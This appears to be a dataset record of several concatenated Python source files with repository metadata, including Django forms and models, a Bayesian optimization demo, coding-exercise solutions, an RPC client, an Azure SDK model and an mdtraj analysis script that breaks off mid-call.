        fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']
class UploadProjectForm(forms.ModelForm):
    """Model form for submitting a UserProject (title, image, description, link)."""
    class Meta:
        model = UserProject
        fields = ['project_title', 'project_image', 'project_description', 'project_link']
class AddorEditProfile(forms.ModelForm):
    """Model form for creating or editing a UserProfile (photo, bio, socials)."""
    class Meta:
        model = UserProfile
        fields = ['photo_path', 'user_bio', 'facebook_account', 'twitter_account', 'instagram_account']
| [
"[email protected]"
] | |
5404e3ad8934d8abdd386447c64ee0c0a8c716f7 | 93f5ee5cc7b863029c54a766e9f5fa0b0e52191f | /BayesianOptimization/20180403_two_hparas.py | f2c660d6aa1078720adfdb30d305f189ed7051c7 | [] | no_license | ShihPingLai/Jacob-deep_learning | 29ad17839da7a34e01db1a626942862e250e8619 | dfbaa178ac537a189a062a23904072a7d8e550a9 | refs/heads/master | 2020-03-13T11:51:51.276939 | 2018-04-26T04:19:15 | 2018-04-26T04:19:15 | 131,108,620 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,156 | py | #!/usr/bin/python3
'''
Abstract:
This is a program to exercise how to optimize deep learning with Bayesian Optimization.
Copy from "BayesianOptimization/examples/exploitation vs exploration.ipynb"
Usage:
20180403_two_hparas.py
Source:
BayesianOptimization/examples/exploitation vs exploration.ipynb
##################################
# Python3 #
# This code is made in python3 #
##################################
20170403
####################################
update log
20180403 version alpha 1:
1. I don't know
'''
# modules for Bayesian
from bayes_opt import BayesianOptimization
import pymc as pm
# modules for deep learning
import tensorflow as tf
# common modules
import numpy as np
import matplotlib.pyplot as plt
import time
from IPython.core.pylabtools import figsize
# Utility function for plotting
def plot_bo(f, bo, figname):
    """Plot the target curve, GP posterior (mean +/- 1 sigma) and the points
    sampled by a finished BayesianOptimization run, then save to ``figname``.

    :param f: 1-D array of target values over the discretised domain
    :param bo: BayesianOptimization instance after ``maximize`` has run
    :param figname: path the figure is written to
    """
    # Hoisted once; the original rebuilt np.arange(len(f)) three times and
    # also computed unused `xs`/`ys` locals from bo.res.
    grid = np.arange(len(f))
    # GP posterior over every grid point (sklearn expects a 2-D X).
    mean, sigma = bo.gp.predict(grid.reshape(-1, 1), return_std=True)

    plt.figure(figsize=(16, 9))
    plt.plot(f)
    plt.plot(grid, mean)
    plt.fill_between(grid, mean + sigma, mean - sigma, alpha=0.1)
    # Red dots: the points actually evaluated by the optimizer.
    plt.scatter(bo.X.flatten(), bo.Y, c="red", s=50, zorder=10)
    plt.xlim(0, len(f))
    plt.ylim(f.min() - 0.1 * (f.max() - f.min()),
             f.max() + 0.1 * (f.max() - f.min()))
    plt.savefig(figname)
    # Close the figure so the six calls in this script do not accumulate
    # open matplotlib figures.
    plt.close()
    return
#--------------------------------------------
# main code
if __name__ == "__main__":
    # VERBOSE > 0 additionally shows the raw target curve before optimising.
    VERBOSE = 0
    # measure times
    start_time = time.time()
    #-----------------------------------
    # load hyperparas
    # use sklearn's default parameters for theta and random_start
    gp_params = {"alpha": 1e-5, "n_restarts_optimizer": 2}
    # Target function
    np.random.seed(42)
    xs = np.linspace(-2, 10, 10000)
    f = np.exp(-(xs - 2)**2) + np.exp(-(xs - 6)**2/10) + 1/ (xs**2 + 1)
    if VERBOSE>0:
        plt.plot(f)
        plt.show()
    #-----------------------------------
    # Acquisition function 1: Upper Confidence Bound
    # Prefer exploitation (kappa=1.0)
    # (small kappa weights the GP mean, large kappa the GP uncertainty)
    bo = BayesianOptimization(f=lambda x: f[int(x)],
                              pbounds={"x": (0, len(f)-1)},
                              verbose=0)
    bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=1, **gp_params)
    plot_bo(f, bo, "ucb_exploitation.png")
    # Prefer exploration (kappa=10)
    bo = BayesianOptimization(f=lambda x: f[int(x)],
                              pbounds={"x": (0, len(f)-1)},
                              verbose=0)
    bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=10, **gp_params)
    plot_bo(f, bo, "ucb_exploration.png")
    #-----------------------------------
    # Acquisition function 2: Expected Improvement
    # Prefer exploitation (xi=0.0)
    bo = BayesianOptimization(f=lambda x: f[int(x)],
                              pbounds={"x": (0, len(f)-1)},
                              verbose=0)
    bo.maximize(init_points=2, n_iter=25, acq="ei", xi=1e-4, **gp_params)
    plot_bo(f, bo, "ei_exploitation.png")
    # Prefer exploration (xi=0.1)
    bo = BayesianOptimization(f=lambda x: f[int(x)],
                              pbounds={"x": (0, len(f)-1)},
                              verbose=0)
    bo.maximize(init_points=2, n_iter=25, acq="ei", xi=0.1, **gp_params)
    plot_bo(f, bo, "ei_exploration.png")
    #-----------------------------------
    # Acquisition function 3: Probability of Improvement
    # Prefer exploitation (xi=0.0)
    bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
    bo.maximize(init_points=2, n_iter=25, acq="poi", xi=1e-4, **gp_params)
    plot_bo(f, bo, "poi_exploitation.png")
    # Prefer exploration (xi=0.1)
    bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
    bo.maximize(init_points=2, n_iter=25, acq="poi", xi=0.1, **gp_params)
    plot_bo(f, bo, "poi_exploration.png")
    #-----------------------------------
    # measuring time
    elapsed_time = time.time() - start_time
    print ("Exiting Main Program, spending ", elapsed_time, "seconds.")
| [
"[email protected]"
] | |
c88a1af397f5418a03100cac9cde8e9e4629f207 | 34d1d64a049dd3a25293955f6312072f2fcb3905 | /set-1/challenge2.py | f54288641f2df4a0648832da78827542e6a9bb54 | [] | no_license | alex-bellon/cryptopals | c82ec87377911e6cae365cb48b2058789b93b9a1 | 5bc6242a5b972866ba7eebe2f6efa80c7ebff71c | refs/heads/master | 2020-05-03T18:40:02.320249 | 2019-08-16T21:15:27 | 2019-08-16T21:15:27 | 178,761,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | a = '1c0111001f010100061a024b53535009181c'
b = '686974207468652062756c6c277320657965'

# Cryptopals set 1, challenge 2 (fixed XOR): XOR the two equal-length hex
# buffers `a` (defined above) and `b`.  Parsing the hex straight to int
# removes the original's needless detour through bin()-formatted strings
# (hex -> binary string -> int).
c = int(a, 16) ^ int(b, 16)
print(hex(c))
| [
"[email protected]"
] | |
26534e055871d229971a287afd01f30afec488e8 | 03d07de94fc22d1583c45ca84c711a06df8a40ff | /lc/dynamic_programming/lc_91_decode-ways.py | 47e6fb60ea6793ea85275e7e4575d8b528ab5713 | [] | no_license | gaopenghigh/algorithm | 94e04293c69a2ad6903495e1cf6e1b75556535bb | f5d78c98c7201c56f9d4c3a9c0c76e9447a17985 | refs/heads/master | 2022-03-11T18:46:38.712923 | 2022-02-20T14:20:54 | 2022-02-20T14:20:54 | 54,484,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,054 | py | # 91. 解码方法
# 难度 中等
# 一条包含字母 A-Z 的消息通过以下映射进行了 编码 :
# 'A' -> "1"
# 'B' -> "2"
# ...
# 'Z' -> "26"
# 要 解码 已编码的消息,所有数字必须基于上述映射的方法,反向映射回字母(可能有多种方法)。例如,"11106" 可以映射为:
# "AAJF" ,将消息分组为 (1 1 10 6)
# "KJF" ,将消息分组为 (11 10 6)
# 注意,消息不能分组为 (1 11 06) ,因为 "06" 不能映射为 "F" ,这是由于 "6" 和 "06" 在映射中并不等价。
# 给你一个只含数字的 非空 字符串 s ,请计算并返回 解码 方法的 总数 。
# 题目数据保证答案肯定是一个 32 位 的整数。
#
# 示例 1:
# 输入:s = "12"
# 输出:2
# 解释:它可以解码为 "AB"(1 2)或者 "L"(12)。
#
# 示例 2:
# 输入:s = "226"
# 输出:3
# 解释:它可以解码为 "BZ" (2 26), "VF" (22 6), 或者 "BBF" (2 2 6) 。
#
# 示例 3:
# 输入:s = "0"
# 输出:0
# 解释:没有字符映射到以 0 开头的数字。
# 含有 0 的有效映射是 'J' -> "10" 和 'T'-> "20" 。
# 由于没有字符,因此没有有效的方法对此进行解码,因为所有数字都需要映射。
#
# 提示:
# 1 <= s.length <= 100
# s 只包含数字,并且可能包含前导零。
# 动态规划第一步要明确两点,「状态」和「选择」。
# 状态,就是对一个局面的描述。通过一个状态,可以定义一个子问题,而动态规划的核心就是分解为子问题。
# 选择,就是某个动作,通过一个动作,问题可以拆解为子问题
# 动态规划的框架如下:
# for 状态1 in 状态1的所有取值:
# for 状态2 in 状态2的所有取值:
# for ...
# dp[状态1][状态2][...] = 择优(选择1,选择2...)
#
# 本题中,“状态”就是带解码的字符串,
# 至于选择,对于每个字符串的最后一个字符,可以选择自成一体,或者选择与它前面的字符合体。
# 使用 dp[i] = x 表示 s[:i] 最多有 x 中解码方式。
# 对于 s[:i] 的最后一个字符 s[i-1],有如下几种情况
# 1. s[i-1] 自称一体,前提是 1 <= int(s[i-1]) <= 9,则 dp[i] = dp[i-1]
# 2. s[i-1] 和 s[i-2] 合体,前提是 s[i-2] != '0' 并且 1 <= int(s[i-2]) * 10 + int(s[i-1]) <= 26,则 dp[i] = dp[i-2]
# 两者之和就是最终 dp[i] 的值
# base case: dp[0] = 1, 表示空字符串也算是一种解码方法
# 另外由于 dp[i] 只依赖于 dp[i-1] 和 dp[i-2],所以可以压缩 dp 数组,只用 3 个变量即可
class Solution:
    def numDecodings(self, s: str) -> int:
        """Return the number of ways to decode the digit string s (LeetCode 91).

        dp[i] is the number of decodings of s[:i]; dp[0] = 1 (the empty
        string has exactly one decoding).  The last character of s[:i] can
        either stand alone ('1'-'9') or pair with the previous character
        ('10'-'26', no leading zero).
        """
        n = len(s)
        dp = [0] * (n + 1)
        dp[0] = 1
        for i in range(1, n + 1):
            ways = 0
            # Single digit: valid iff it is '1'-'9' ('0' cannot stand alone).
            if s[i - 1] != '0':
                ways = dp[i - 1]
            # Two digits: only possible from i >= 2.  The original omitted
            # this guard, so at i == 1 it read s[i-2] == s[-1] and dp[-1]
            # (negative-index wraparound) -- harmless only because dp[-1]
            # was still 0 at that point.
            if i >= 2 and s[i - 2] != '0' and 10 <= int(s[i - 2:i]) <= 26:
                ways += dp[i - 2]
            dp[i] = ways
        return dp[n]
if __name__ == '__main__':
    # Smoke test: "12" decodes as (1 2) or (12) -> expect 2.
    s = '12'
print(Solution().numDecodings(s)) | [
"[email protected]"
] | |
6ffabdb437b2f0229262f2a7b57b5eb2b66df757 | beb12cce69e21804a9ec4d64062bf6bb062261aa | /bin/EAFP.py | 74646c34e932b3821298f5c393f4bebacf076c1c | [] | no_license | voyeg3r/dotfaster | f7a0cad32ea3420417cd728be24a58533cb907fa | 90c4f1ec4471668fec1f4db755158058fb533be2 | refs/heads/master | 2021-01-02T22:49:47.246952 | 2018-06-02T20:56:58 | 2018-06-02T20:56:58 | 99,405,357 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | #!/usr/bin/env python3
# # -*- coding: UTF-8 -*-"
# ------------------------------------------------
# Creation Date: 23-03-2017
# Last Change: ter 29 nov 2016 09:21:52 BRT
# File: EAFP.py
# author: sergio luiz araujo silva
# site: http://vivaotux.blogspot.com
# twitter: @voyeg3r
# ------------------------------------------------
'''
Demonstrate the EAFP principle ("it is easier to ask forgiveness than
permission"): attempt the dict-driven format directly and handle the
missing-key error, instead of checking every key up front.
'''

# All three keys referenced by the format string are present; remove one to
# see the except branch fire.
person = {'name': 'Jess', 'age': 23, 'job': 'Programmer'}

try:
    # str.format(**person) looks up 'name', 'age' and 'job' in the dict and
    # raises KeyError for any that is missing.
    print("I'm {name}. I'm {age} years old and I'm {job}".format(**person))
except KeyError as e:
    # EAFP: the failure is reported only if the lookup actually fails.
    print(f"Missing {e} key")
| [
"[email protected]"
] | |
0876651216fe8d66b6ac1486bdb463a7eb6bcf0b | b37b62a73a14ed3904ffed1db99dafe01bc9eca3 | /app/list/models.py | 3c3e2f812571158f337b54618fddebb78ef4c17e | [] | no_license | gambler1541/django-pagination | d340d7ce3186f801ce1cf4aadb59ee77bd52e9d6 | 44c32be793c0bd2332f29ba5422205ccf0c2d2b8 | refs/heads/master | 2020-04-16T22:56:16.565405 | 2019-01-16T06:59:51 | 2019-01-16T06:59:51 | 165,990,830 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | from django.db import models
from django.views.generic import ListView
class Constacts(models.Model):
    """A single contact entry holding free-form text.

    NOTE(review): the class name looks like a typo for "Contacts"; renaming
    would require a migration and updating importers, so it is only flagged.
    """
    # Free-form contact text; defaults to the empty string.
    text = models.TextField(default='')
| [
"[email protected]"
] | |
fb20a737b4b3bc2e0a86a1ea9b5a7945456c6851 | dacdebab897f9287f37a2e85c5705a926ddd36aa | /tests/test_issue930/Snakefile | 06cbf60fd181788b35dd44ff28d8bc6855f13952 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | snakemake/snakemake | 5d4528193d87786d7b372ca7653ece302ff46965 | 27b224ed12448df8aebc7d1ff8f25e3bf7622232 | refs/heads/main | 2023-09-02T08:37:04.323976 | 2023-08-11T10:02:34 | 2023-08-11T10:02:34 | 212,840,200 | 1,941 | 536 | MIT | 2023-09-11T09:51:44 | 2019-10-04T14:58:11 | HTML | UTF-8 | Python | false | false | 646 | samples = ["0","1"]
# Final target: the single aggregated output produced by rule c.
rule all:
    input:
        "test.out"

# Stand-in for an expensive shared resource consumed by every per-sample job.
rule build_index:
    output:
        "large_reference_index"
    shell:
        "touch {output}"

# Per-sample step 1; grouped so a and b for one sample run as one group job.
rule a:
    output:
        "a/{sample}.out"
    group:
        "sample_group"
    shell:
        "touch {output}"

# Per-sample step 2: consumes rule a's output plus the shared index (a
# non-grouped input feeding into a group -- the directory name suggests this
# reproduces snakemake issue 930; not verifiable here).
rule b:
    input:
        rules.a.output,
        rules.build_index.output
    output:
        "b/{sample}.out"
    group:
        "sample_group"
    shell:
        "touch {output}"

# Aggregation over all samples listed in `samples` (defined at file top).
rule c:
    input:
        expand("a/{sample}.out", sample=samples),
        expand("b/{sample}.out", sample=samples)
    output:
        "test.out"
    shell:
        "touch {output}"
| [
"[email protected]"
] | ||
25ed4fc80f15bd27a6243626cc74db6d6f20abe2 | 8bb3bcf914860c20fb4a7163a8e0691cd802dd65 | /ve/unit/test_list_object.py | df090cc057e76b5308629ac65f3383056bb0ac50 | [
"Apache-2.0"
] | permissive | nitinm694/pyvsc | 8586cc2497f336289fecbfeb9e6dd788f4070b60 | 612de9e6244c685a3df1972e4860abfe35b614e1 | refs/heads/master | 2023-07-28T01:49:10.917496 | 2021-09-12T19:06:00 | 2021-09-12T19:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,362 | py | '''
Created on Jun 20, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
class TestListObject(VscTestCase):
    """Tests for vsc.rand_list_t holding randomizable objects.

    NOTE: inside @vsc.constraint methods, bare expressions such as
    ``it.a == it.b`` are not no-ops -- the vsc DSL records them as
    constraint terms via operator overloading.
    """
    def test_smoke(self):
        """A list of 10 random objects randomizes without constraints."""
        @vsc.randobj
        class item_c(object):
            def __init__(self):
                self.a = vsc.rand_uint8_t()
                self.b = vsc.rand_uint8_t()
        @vsc.randobj
        class container_c(object):
            def __init__(self):
                self.l = vsc.rand_list_t(item_c())
                for i in range(10):
                    self.l.append(item_c())
        c = container_c()
        c.randomize()
        for i,it in enumerate(c.l):
            print("Item[" + str(i) + "] a=" + str(it.a) + " b=" + str(it.b))
    def test_constraints(self):
        """A foreach constraint (a == b) holds for every list element."""
        @vsc.randobj
        class item_c(object):
            def __init__(self):
                self.a = vsc.rand_uint8_t()
                self.b = vsc.rand_uint8_t()
        @vsc.randobj
        class container_c(object):
            def __init__(self):
                self.l = vsc.rand_list_t(item_c())
                for i in range(10):
                    self.l.append(item_c())
            @vsc.constraint
            def all_eq_c(self):
                with vsc.foreach(self.l) as it:
                    it.a == it.b
        c = container_c()
        for i in range(100):
            c.randomize()
            for it in c.l:
                self.assertEqual(it.a, it.b)
    def test_init_array_block(self):
        """Index-dependent foreach constraint: a < b at even indices, a > b at odd."""
        @vsc.randobj
        class item_c(object):
            def __init__(self):
                self.a = vsc.rand_uint8_t()
                self.b = vsc.rand_uint8_t()
        @vsc.randobj
        class container_c(object):
            def __init__(self):
                self.l = vsc.rand_list_t(item_c())
                for i in range(10):
                    self.l.append(item_c())
            @vsc.constraint
            def all_eq_c(self):
                with vsc.foreach(self.l, it=True,idx=True) as (idx,it):
                    with vsc.if_then((idx&1) == 0):
                        it.a < it.b
                    with vsc.else_then:
                        it.a > it.b
        c = container_c()
        for i in range(100):
            c.randomize()
            self.assertEqual(10, len(c.l))
            for i,it in enumerate(c.l):
                if (i%2) == 0:
                    self.assertLess(it.a, it.b)
                else:
                    self.assertGreater(it.a, it.b)
    def test_diff_classes(self):
        """Heterogeneous list: subclasses carry their own class constraints."""
        @vsc.randobj
        class item_c(object):
            def __init__(self):
                self.a = vsc.rand_uint8_t()
                self.b = vsc.rand_uint8_t()
        @vsc.randobj
        class item_c_1(item_c):
            def __init__(self):
                super().__init__()
            @vsc.constraint
            def a_lt_b_c(self):
                self.a < self.b
        @vsc.randobj
        class item_c_2(item_c):
            def __init__(self):
                super().__init__()
            @vsc.constraint
            def a_gt_b_c(self):
                self.a > self.b
        @vsc.randobj
        class container_c(object):
            def __init__(self):
                self.l = vsc.rand_list_t(item_c())
                for i in range(10):
                    if i%2 == 0:
                        self.l.append(item_c_1())
                    else:
                        self.l.append(item_c_2())
        c = container_c()
        print("Model: " + ModelPrettyPrinter.print(c.get_model()))
        for i in range(100):
            c.randomize()
            self.assertEqual(10, len(c.l))
            for i,it in enumerate(c.l):
                if i%2 == 0:
                    self.assertLess(it.a, it.b)
                else:
                    self.assertGreater(it.a, it.b)
| [
"[email protected]"
] | |
8083d6ab3311a0ec517636a91fd33a22445421bd | 7fa15c4dbca224aed616e76074bf017699af00df | /examples/sum_client.py | 0011bc63474cfec50e1d633ae091f99a0ddb1f0e | [
"Apache-2.0"
] | permissive | studio-ousia/mprpc | cc272e650b46a21997c680cf00e5ccbc015dc709 | 6076f68a16f78e0010307344afa253e0956f2a9d | refs/heads/master | 2023-01-14T02:33:22.171728 | 2022-12-27T07:13:23 | 2022-12-27T07:13:23 | 13,551,567 | 170 | 60 | NOASSERTION | 2023-02-18T15:15:10 | 2013-10-14T03:15:41 | Cython | UTF-8 | Python | false | false | 595 | py | # -*- coding: utf-8 -*-
import gsocketpool.pool
import gevent.pool
from mprpc import RPCClient, RPCPoolClient
def call():
    # One blocking 'sum' RPC over a dedicated connection (Python 2 print syntax).
    client = RPCClient('127.0.0.1', 6000)
    print client.call('sum', 1, 2)
def call_using_pool():
    # Issue ten concurrent 'sum' RPCs, borrowing a pooled connection per call.
    options = dict(host='127.0.0.1', port=6000)
    client_pool = gsocketpool.pool.Pool(RPCPoolClient, options)
    def _call(n):
        # Take a connection from the pool for the duration of one call;
        # the `with` block returns it automatically. `n` is unused.
        with client_pool.connection() as client:
            return client.call('sum', 1, 2)
    # Ten greenlets drive the ten calls; results arrive in completion order.
    glet_pool = gevent.pool.Pool(10)
    print [result for result in glet_pool.imap_unordered(_call, xrange(10))]
# Script entry: run both demos on import/execution (no __main__ guard).
call()
call_using_pool()
| [
"[email protected]"
] | |
530d9a1a9c81e48861a573078a5fcca53d28e741 | e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67 | /azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2017_06_01/models/network_interface_association.py | 56f1d3b0eda3f4acd5b0007f57df14bfd8f42f49 | [] | no_license | EnjoyLifeFund/macHighSierra-cellars | 59051e496ed0e68d14e0d5d91367a2c92c95e1fb | 49a477d42f081e52f4c5bdd39535156a2df52d09 | refs/heads/master | 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null | UTF-8 | Python | false | false | 1,281 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NetworkInterfaceAssociation(Model):
    """A network interface together with the custom security rules applied to it.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Network interface ID.
    :vartype id: str
    :param security_rules: Collection of custom security rules.
    :type security_rules: list of :class:`SecurityRule
     <azure.mgmt.network.v2017_06_01.models.SecurityRule>`
    """

    # 'id' is populated by the service, so it is read-only for serialization.
    _validation = {'id': {'readonly': True}}

    # Python attribute -> wire key / msrest type-string mapping.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'security_rules': {'key': 'securityRules', 'type': '[SecurityRule]'},
    }

    def __init__(self, security_rules=None):
        # The server fills in 'id'; clients never supply it.
        self.id = None
        self.security_rules = security_rules
| [
"[email protected]"
] | |
40704cee49a3949e9dcf543e0695bacb829c017f | e885c02621101ea646c9dcc3e934dd7ceaaf4f04 | /djangocms_disqus/migrations/0001_initial.py | 7be273f44c0b09ed5f6447a8d57db12cadbb0691 | [
"BSD-3-Clause"
] | permissive | mishbahr/djangocms-disqus | 40421d6662ef911542287fc0c2e8b81a63e49667 | 49e75a024e2ca1c932a8b9134500c2f24137a153 | refs/heads/master | 2023-01-05T00:46:39.514178 | 2017-05-23T22:15:12 | 2017-05-23T22:15:12 | 42,411,019 | 21 | 5 | BSD-3-Clause | 2022-12-26T19:52:38 | 2015-09-13T20:07:18 | Python | UTF-8 | Python | false | false | 1,804 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from connected_accounts.fields import AccountField
from ..conf import settings
class Migration(migrations.Migration):
    """Initial migration: creates the Disqus CMS-plugin model.

    Auto-generated; the model subclasses cms.CMSPlugin (see `bases`) and links
    to a connected Disqus account via AccountField.
    """
    dependencies = [
        ('connected_accounts', '__latest__'),
        ('cms', '__latest__'),
    ]
    operations = [
        migrations.CreateModel(
            name='Disqus',
            fields=[
                ('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
                ('shortname', models.CharField(help_text='Select a website Or register a new one on the Disqus website. https://disqus.com/admin/signup/', max_length=150, verbose_name='Shortname')),
                ('enable_sso', models.BooleanField(default=False, help_text='Allows users to log in to Disqus via your site.', verbose_name='Enable Single Sign-On')),
                ('load_event', models.CharField(default=settings.DJANGOCMS_DISQUS_LOADING_CHOICES[0][0], max_length=100, verbose_name='Load Disqus', choices=settings.DJANGOCMS_DISQUS_LOADING_CHOICES)),
                ('site_name', models.CharField(help_text='Used for the SSO login button.', max_length=100, verbose_name='Site Name', blank=True)),
                ('button_text', models.CharField(help_text='By default it will be "Load Comments..."', max_length=100, verbose_name='Button Text', blank=True)),
                ('account', AccountField(verbose_name='Connected Account', to='connected_accounts.Account', provider='disqus', help_text='Select a connected Disqus account or connect to a new account.')),
            ],
            options={
                'abstract': False,
            },
            bases=('cms.cmsplugin',),
        ),
    ]
| [
"[email protected]"
] | |
3a79fc6c3eb34308f2013497b29f90ad59a89e7b | fc85a54686e13e598541df14c472e8aa744e6713 | /petisco/extra/sqlalchemy/sql/mysql/mysql_connection.py | ccf69974f1b0fbfe9c880d72c61912564fc1f72c | [
"MIT"
] | permissive | alice-biometrics/petisco | 63721751cd43e70825b161a5ece535c80d95b6fa | 771ebe5c69dc735b8f373c2e7303d3b4eb655044 | refs/heads/main | 2023-09-01T03:53:23.642042 | 2023-08-25T05:38:42 | 2023-08-25T05:38:42 | 217,555,512 | 42 | 2 | MIT | 2023-09-12T11:06:43 | 2019-10-25T14:48:10 | Python | UTF-8 | Python | false | false | 1,700 | py | import os
MYSQL_DATABASE_DEFAULT = "mysql_test"


class MySqlConnection:
    """Value object holding MySQL connection settings plus the derived URL.

    Instances are normally built through one of the factory methods:
    `create` (explicit settings), `create_local` (localhost on port 3307)
    or `from_environ` (MYSQL_* environment variables).
    """

    def __init__(
        self,
        server_name: str,
        driver: str,
        user: str,
        password: str,
        host: str,
        port: str,
        database_name: str,
        url: str,
    ):
        # Plain attribute storage; no validation is performed here.
        self.server_name = server_name
        self.driver = driver
        self.user = user
        self.password = password
        self.host = host
        self.port = port
        self.database_name = database_name
        self.url = url

    @staticmethod
    def create(
        server_name: str = "mysql",
        driver: str = "pymysql",
        user: str = "root",
        password: str = "root",
        host: str = "mysql",
        port: str = "3306",
        database_name: str = MYSQL_DATABASE_DEFAULT,
    ) -> "MySqlConnection":
        """Build a connection whose URL follows the
        dialect+driver://user:password@host:port/database convention."""
        credentials = f"{user}:{password}"
        endpoint = f"{host}:{port}"
        url = f"{server_name}+{driver}://{credentials}@{endpoint}/{database_name}"
        return MySqlConnection(
            server_name, driver, user, password, host, port, database_name, url
        )

    @staticmethod
    def create_local(database_name: str = MYSQL_DATABASE_DEFAULT) -> "MySqlConnection":
        """Connection pointed at localhost on port 3307."""
        return MySqlConnection.create(
            host="localhost", port="3307", database_name=database_name
        )

    @staticmethod
    def from_environ() -> "MySqlConnection":
        """Read user/password/host/port/database from MYSQL_* environment
        variables, falling back to the same defaults as `create`."""
        env = os.environ.get
        return MySqlConnection.create(
            "mysql",
            "pymysql",
            env("MYSQL_USER", "root"),
            env("MYSQL_PASSWORD", "root"),
            env("MYSQL_HOST", "mysql"),
            env("MYSQL_PORT", "3306"),
            env("MYSQL_DATABASE", MYSQL_DATABASE_DEFAULT),
        )
| [
"[email protected]"
] | |
5e92281f35cff75f5d8fd68958f6faad390bb658 | 1711a28e01e40c0164be23536ff109c428f3dd8c | /SUMO_compound_mdtraj_analysis.py | 6d5a65145a08e70043aae6c8b2f867f060261593 | [] | no_license | sunhuaiyu/mdtraj | adafd4b4408b688f23fed659e8fbaefd4ff1bd42 | d626841025e9f9411e988cee6631edcbf171499d | refs/heads/master | 2020-05-07T20:28:33.381621 | 2019-05-02T00:00:02 | 2019-05-02T00:00:02 | 180,862,388 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,277 | py | import numpy as np
import matplotlib.pyplot as plt
import mdtraj as md
from glob import glob
from multiprocessing import Pool
def SUMO_ligand_dist(tr):
    """Per-frame distance (nm) between the SUMO Phe CG atom and the ligand's
    center of mass, for an mdtraj Trajectory `tr`."""
    # Coordinates for the C-gamma of SUMO1_F36, SUMO2_F31, or SUMO3_F31
    # (only the first matching atom is used):
    select_str = '(resname==PHE and (resid==15 or resid==30 or resid==17)) and (name==CG)'
    atom_ix = tr.topology.select(select_str)[0]
    a = tr.xyz[:, atom_ix]
    # Ligand = chain 1; take all its atoms:
    lig = tr.atom_slice(tr.topology.select('chainid==1'))
    # Ligand center of mass, one point per frame:
    b = md.compute_center_of_mass(lig)
    # Euclidean distance per frame between the Phe CG position and the
    # ligand center of mass.
    return (((a - b) ** 2).sum(1)) ** 0.5
# read trajectory file in HDF5 format (*.h5), compute SUMO_ligand_dist
def name2traj(file_name):
    """Load an HDF5 trajectory; subsample 10x when longer than 10000 frames."""
    tr = md.load(file_name)
    if tr.n_frames > 10000:
        tr = tr[::10]
    return tr
# given trajectory file name in HDF5 format, plot SUMO_ligand_dist
def plot_dist(traj_name):
    """Plot the SUMO-ligand distance trace for one trajectory file and save
    it as '<name>.jpg' (title/file name taken from the part before the first dot)."""
    plt.plot(SUMO_ligand_dist(name2traj(traj_name)), linewidth=1)
    plt.ylim(0, 4.5)
    title = traj_name.split('.')[0]
    plt.title(title)
    plt.savefig(title + '.jpg', dpi=600)
    plt.close()
# calculate fraction of frames where the distance is less than a cut-off
# Compounds under study and, for each, the matching trajectory files on disk.
compound = ['PHG00686', 'SEW05414', 'HTS12268', 'BTB13496']
compound2traj_name = {i: glob('SUMO1_2uyz_{}_F*_5000ns.h5'.format(i)) for i in compound}
# Flatten the per-compound file lists into one flat list.
# BUG FIX: sum() needs an explicit [] start value to concatenate lists;
# the original sum(list(...)) raised TypeError (int + list).
traj_files = sum(list(compound2traj_name.values()), [])
# traj_dict contains all loaded trajectories
# dist_dict contains all calculated distances;
# accelerate calculation with multiprocessing
def D(file_name):
    """Multiprocessing worker: load one trajectory and compute its SUMO-ligand
    distance trace. Returns [trajectory, distances]."""
    tr = name2traj(file_name)
    d = SUMO_ligand_dist(tr)
    return [tr, d]
DD = Pool(48).map(D, traj_files)
traj_dict = {i[0]:i[1][0] for i in zip(traj_files, DD)}
dist_dict = {i[0]:i[1][1] for i in zip(traj_files, DD)}
# distance (nm) threshold
T = 0.7
# calculate the fraction of trajectories with compound at SIM-binding site
for cp in compound:
all_dist = np.array([dist_dict[i] for i in compound2traj_name[cp]]).ravel()
bound_frames, total_frames = sum(all_dist < T), len(all_dist)
fraction = bound_frames/total_frames
print(cp, round(fraction, 3), total_frames//1000)
# plotting: stack all distance plot together for each compound
for cp in compound:
n = len(compound2traj_name[cp])
fig, axs = plt.subplots(nrows=n, ncols=1, sharex=True)
fig.set_figheight(n)
fig.set_figwidth(4)
axs[0].set_title(cp)
for i in np.arange(n):
dc = dist_dict['SUMO1_2uyz_{0}_F{1}_5000ns.h5'.format(cp, i+1)]
bound = dc < T
unbound = np.invert(bound)
length = dc.shape[0]
axs[i].plot(np.arange(length)[unbound], dc[unbound],
'C1.', markersize=0.5, alpha=0.6)
axs[i].plot(np.arange(length)[bound], dc[bound],
'C0.', markersize=0.5, alpha=0.6)
axs[i].set_ylim(0, 4.5)
fig.subplots_adjust(hspace=0)
fig.savefig('SUMO1_2uyz_{}_dist_all_traj.jpg'.format(cp),
